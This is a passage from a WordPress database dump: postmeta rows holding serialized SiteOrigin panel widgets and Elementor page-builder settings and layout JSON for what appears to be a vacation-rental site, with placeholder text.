";s:16:\"sow-image-210001\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:2;a:15:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:16:\"sow-image-210002\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:146:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</h3>\n<h5 style=\"text-align: center;\"><em> </em></h5>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:19:\"_sow_form_timestamp\";s:13:\"1554065104861\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:17:\"sow-editor-210003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:2;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:2;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:3;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1657,722,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:15:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5884f571d38e5\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"b627ea77-e6f1-487a-9a45-ac225355f02a\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-image-72210000\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:1;a:15:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-image-72210001\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:2;a:15:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:18:\"sow-image-72210002\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:146:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</h3>\n<h5 style=\"text-align: center;\"><em> </em></h5>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:19:\"_sow_form_timestamp\";s:13:\"1554065104861\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:19:\"sow-editor-72210003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:2;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:2;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:3;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1658,723,'panels_data','a:3:{s:7:\"widgets\";a:4:{i:0;a:15:{s:5:\"image\";i:209;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:7:\"default\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5884f571d38e5\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:0;s:2:\"id\";i:0;s:9:\"widget_id\";s:36:\"b627ea77-e6f1-487a-9a45-ac225355f02a\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:16:\"sow-image-210000\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:1;a:15:{s:5:\"image\";i:210;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:6:\"center\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cf1ab2bd4\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:1;s:2:\"id\";i:1;s:9:\"widget_id\";s:36:\"ca65f0df-7424-4df0-be25-3ade6905157c\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:16:\"sow-image-210001\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:2;a:15:{s:5:\"image\";i:211;s:14:\"image_fallback\";s:0:\"\";s:4:\"size\";s:4:\"full\";s:5:\"align\";s:5:\"right\";s:5:\"title\";s:0:\"\";s:14:\"title_position\";s:6:\"hidden\";s:3:\"alt\";s:0:\"\";s:3:\"url\";s:0:\"\";s:5:\"bound\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cedcecddc\";s:10:\"new_window\";b:0;s:10:\"full_width\";b:0;s:11:\"panels_info\";a:7:{s:5:\"class\";s:30:\"SiteOrigin_Widget_Image_Widget\";s:3:\"raw\";b:0;s:4:\"grid\";i:0;s:4:\"cell\";i:2;s:2:\"id\";i:2;s:9:\"widget_id\";s:36:\"6dc5bf6b-eef8-44d7-a273-45eb7ad8a950\";s:5:\"style\";a:1:{s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:16:\"sow-image-210002\";s:11:\"option_name\";s:16:\"widget_sow-image\";}i:3;a:9:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:146:\"<h3 style=\"text-align: center;\">We look forward to making this your favorite vacation spot.</h3>\n<h5 style=\"text-align: center;\"><em> </em></h5>\n\";s:20:\"text_selected_editor\";s:7:\"tinymce\";s:5:\"autop\";b:1;s:12:\"_sow_form_id\";s:13:\"5775cbda086a7\";s:19:\"_sow_form_timestamp\";s:13:\"1554065104861\";s:11:\"panels_info\";a:6:{s:5:\"class\";s:31:\"SiteOrigin_Widget_Editor_Widget\";s:4:\"grid\";i:1;s:4:\"cell\";i:0;s:2:\"id\";i:3;s:9:\"widget_id\";s:36:\"73c41aa6-fedd-4864-8392-482a5aeb5d92\";s:5:\"style\";a:2:{s:27:\"background_image_attachment\";b:0;s:18:\"background_display\";s:4:\"tile\";}}s:22:\"so_sidebar_emulator_id\";s:17:\"sow-editor-210003\";s:11:\"option_name\";s:17:\"widget_sow-editor\";}}s:5:\"grids\";a:2:{i:0;a:2:{s:5:\"cells\";i:3;s:5:\"style\";a:0:{}}i:1;a:2:{s:5:\"cells\";i:1;s:5:\"style\";a:0:{}}}s:10:\"grid_cells\";a:4:{i:0;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:0;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:1;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:1;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:2;a:4:{s:4:\"grid\";i:0;s:5:\"index\";i:2;s:6:\"weight\";d:0.333333333333000025877623784253955818712711334228515625;s:5:\"style\";a:0:{}}i:3;a:4:{s:4:\"grid\";i:1;s:5:\"index\";i:0;s:6:\"weight\";i:1;s:5:\"style\";a:0:{}}}}'),(1713,732,'vantage_panels_no_legacy','true'),(1714,732,'_edit_lock','1554775940:1'),(1715,732,'_edit_last','1'),(1716,732,'_wp_page_template','default'),(1730,732,'vantage_metaslider_slider',''),(1731,732,'vantage_metaslider_slider_stretch','1'),(1732,732,'vantage_menu_icon',''),(1733,732,'siteorigin_page_settings','a:7:{s:6:\"layout\";s:7:\"default\";s:10:\"page_title\";b:1;s:15:\"masthead_margin\";b:1;s:13:\"footer_margin\";b:1;s:14:\"featured_image\";b:0;s:13:\"hide_masthead\";b:0;s:19:\"hide_footer_widgets\";b:0;}'),(1734,732,'_yoast_wpseo_content_score','30'),(1735,732,'_elementor_edit_mode','builder'),(1736,732,'_elementor_template_type','post'),(1737,732,'_elementor_version','2.5.12'),(1738,732,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1739,732,'_elementor_data','[{\"id\":\"2014352\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8d9e2d7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"05189bb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"98a2c62\"}]},\"elements\":[{\"id\":\"c4ca5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"09a713d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6013a89\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"53f4487\"}]},\"elements\":[{\"id\":\"ac2eaf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b840cab\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8273103\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c6886a7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4d70721\"}]},\"elements\":[{\"id\":\"5e1242e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dce0399\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fb17f13\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"135ef06\"}]},\"elements\":[{\"id\":\"73dce17\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"be68b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"25fb2d9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"798dfa9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0d85eaa\"}]},\"elements\":[{\"id\":\"39c4f5c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4b6ce55\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"410b766\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"53343c3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c58249a\"}]},\"elements\":[{\"id\":\"1358f4b\",\"elType\":\"widget\",\"settings\":{\"title\":\"My Skill\",\"inner_text\":\"Web Designer\"},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"ac94c6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1710850\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e2ecbc6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"78a15f1\"}]},\"elements\":[{\"id\":\"515716f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"star-rating\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"72ea510\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"fef99a1\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"72c6365\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"e9fb18c\"}]},\"elements\":[{\"id\":\"6278c71\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"407a3d7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"bea0196\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"d5a949b\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"38ed738\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"7421f83\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"67bca18\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"53dc408\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"c9dc8f2\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"bc23a91\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"2872b98\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0c0ad73\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"b7e2a48\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"242e6c0\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"93b8b57\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c5b778e\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"7ac3d00\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"261300e\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e1ca420\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"b00008e\"}]},\"elements\":[],\"isInner\":false},{\"id\":\"8838ce8\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"87ad89a\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"54a984c\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"a4145ee\"}]},\"elements\":[],\"isInner\":false}],\"isInner\":false}]'),(1740,735,'_wp_page_template','default'),(1741,735,'_elementor_edit_mode','builder'),(1742,735,'_elementor_template_type','post'),(1743,735,'_elementor_version','2.5.12'),(1744,735,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1745,735,'_elementor_data','[{\"id\":\"2014352\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8d9e2d7\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"05189bb\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"98a2c62\"}]},\"elements\":[{\"id\":\"c4ca5e3\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"09a713d\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"6013a89\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"53f4487\"}]},\"elements\":[{\"id\":\"ac2eaf0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Click edit button to change this text. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b840cab\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\",\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"8273103\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"c6886a7\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"4d70721\"}]},\"elements\":[{\"id\":\"5e1242e\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"dce0399\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"fb17f13\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"135ef06\"}]},\"elements\":[{\"id\":\"73dce17\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"be68b76\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"25fb2d9\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"798dfa9\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"0d85eaa\"}]},\"elements\":[{\"id\":\"39c4f5c\",\"elType\":\"widget\",\"settings\":{\"text\":\"Click here\"},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"4b6ce55\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"410b766\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"53343c3\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"c58249a\"}]},\"elements\":[{\"id\":\"1358f4b\",\"elType\":\"widget\",\"settings\":{\"title\":\"My Skill\",\"inner_text\":\"Web Designer\"},\"elements\":[],\"widgetType\":\"progress\"}],\"isInner\":false},{\"id\":\"ac94c6b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\"eae_animated_gradient_color\":\"#00a6d8\",\"_id\":\"1710850\"},{\"eae_animated_gradient_color\":\"#b800c9\",\"_id\":\"e2ecbc6\"},{\"eae_animated_gradient_color\":\"#e57600\",\"_id\":\"78a15f1\"}]},\"elements\":[{\"id\":\"515716f\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"star-rating\"}],\"isInner\":false}],\"isInner\":false}]'),(1748,736,'_wp_page_template','default'),(1749,736,'_elementor_edit_mode','builder'),(1750,736,'_elementor_template_type','post'),(1751,736,'_elementor_version','2.5.12'),(1752,736,'_elementor_page_settings','a:12:{s:21:\"background_color_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:23:\"background_color_b_stop\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:25:\"background_gradient_angle\";a:3:{s:4:\"unit\";s:3:\"deg\";s:4:\"size\";i:180;s:5:\"sizes\";a:0:{}}s:15:\"background_xpos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_xpos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:15:\"background_ypos\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:22:\"background_ypos_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";i:0;s:5:\"sizes\";a:0:{}}s:19:\"background_bg_width\";a:3:{s:4:\"unit\";s:1:\"%\";s:4:\"size\";i:100;s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_tablet\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}s:26:\"background_bg_width_mobile\";a:3:{s:4:\"unit\";s:2:\"px\";s:4:\"size\";s:0:\"\";s:5:\"sizes\";a:0:{}}}'),(1753,736,'_elementor_data','[{\"id\":\"2014352\",\"elType\":\"section\",\"settings\":{\"eae_slider_delay\":\"5000\",\"gradient_color_list\":[{\